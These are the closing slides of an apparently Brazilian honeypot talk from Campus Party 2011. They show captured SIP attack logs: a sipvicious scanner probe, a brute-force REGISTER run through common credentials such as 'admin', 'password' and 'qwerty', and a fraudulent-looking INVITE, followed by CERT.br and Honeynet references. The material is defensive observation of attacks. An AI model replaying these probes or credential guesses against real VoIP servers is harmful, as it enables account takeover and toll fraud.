2011, Sao Paulo – janeiro de 2011 – p. 37/41
  • 38. Logs SIP (OPTIONS) U 2010/09/28 22:54:07.491696 89.47.63.183:59317 -> network_server:5060 OPTIONS sip:100@network_server SIP/2.0..Via: SIP/2.0/UDP 127.0.1.1:5060;bra nch=z9hG4bK-3932320937;rport..Content-Length: 0..From: "sipvicious"<sip:100 @1.1.1.1>; tag=6338616232316238313363340132333530383633323634..Accept: appl ication/sdp..User-Agent: friendly-scanner..To: "sipvicious"<sip:100@1.1.1.1 >..Contact: sip:100@127.0.1.1:5060..CSeq: 1 OPTIONS..Call-ID: 3655079754140 81403837664..Max-Forwards: 70.... U 2010/09/28 22:54:07.580669 network_server:5060 -> 89.47.63.183:59317 SIP/2.0 200 OK..Call-id: 365507975414081403837664..Cseq: 1 OPTIONS..From: " sipvicious"<sip:100@1.1.1.1>; tag=63386162323162383133633401323335303836333 23634..To: "sipvicious"<sip:100@1.1.1.1>..Via: SIP/2.0/UDP 127.0.1.1:5060;b ranch=z9hG4bK-3932320937;received=89.47.63.183;rport=59317..Server: Asteris k PBX 1.2.22..Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, N OTIFY, INFO..Supported: replaces, timer..Contact: <sip:network_server>..Acc ept: application/sdp..Content-length: 0.... ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 38/41
  • 39. Los SIP (REGISTER) 2010-10-20 05:57:55 IP: 211.103.141.180, method: REGISTER, from: "123", to: "123", CSeq: "1 REGISTER", user-agent: "friendly-scanner" [...] from: "1234", to: "1234", [...] [...] from: "12345", to: "12345", [...] [...] from: "123456", to: "123456", [...] [...] from: "sip", to: "sip", [...] [...] from: "admin", to: "admin", [...] [...] from: "pass", to: "pass", [...] [...] from: "password", to: "password", [...] [...] from: "testing", to: "testing", [...] [...] from: "guest", to: "guest", [...] [...] from: "voip", to: "voip", [...] [...] from: "account", to: "account", [...] [...] from: "passwd", to: "passwd", [...] [...] from: "qwerty", to: "qwerty", [...] [...] from: "654321", to: "654321", [...] [...] from: "54321", to: "54321", [...] [...] from: "4321", to: "4321", [...] [...] from: "abc123", to: "abc123", [...] [...] from: "123abc", to: "123abc", [...] ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 39/41
  • 40. Logs SIP (INVITE) U 2010/09/30 23:50:21.236653 67.21.82.4:45018 -> network_server:5060 INVITE sip:96626653000@network_server SIP/2.0..Via: SIP/2.0/UDP 67.21.82.4: 45018;rport;branch=z9hG4bK051C0283E05B4BF182275668E1F3BD15..From: 102 <sip: 102@network_server>;tag=129156506..To: <sip:96626653000@network_server>..Co ntact: <sip:102@67.21.82.4:45018>..Call-ID: 3A1309F9-9FAC-4BE3-8B7E-9294496 D1E08@192.168.1.3..CSeq: 9999 INVITE..Max-Forwards: 70..Content-Type: appli cation/sdp..User-Agent: X-PRO build 1101..Content-Length: 312....v=0..o=102 4272671 4272671 IN IP4 67.21.82.4..s=X-PRO..c=IN IP4 67.21.82.4..t=0 0..m= audio 45020 RTP/AVP 0 8 3 18 98 97 101..a=rtpmap:0 pcmu/8000..a=rtpmap:8 pc ma/8000..a=rtpmap:3 gsm/8000..a=rtpmap:18 G729/8000..a=rtpmap:98 iLBC/8000. .a=rtpmap:97 speex/8000..a=rtpmap:101 telephone-event/8000..a=fmtp:101 0-15 .. ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 40/41
  • 41. ˆ Referencias • Honeypots e Honeynets: Definicoes e Aplicacoes ¸˜ ¸˜ http://www.cert.br/docs/whitepapers/honeypots-honeynets/ • Consorcio Brasileiro de Honeypots ´ http://www.honeypots-alliance.org.br/ • The Honeynet Project http://www.honeynet.org/ • CERT.br http://www.cert.br/ • NIC.br http://www.nic.br/ • CGI.br http://www.cgi.br/ ˜ Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 41/41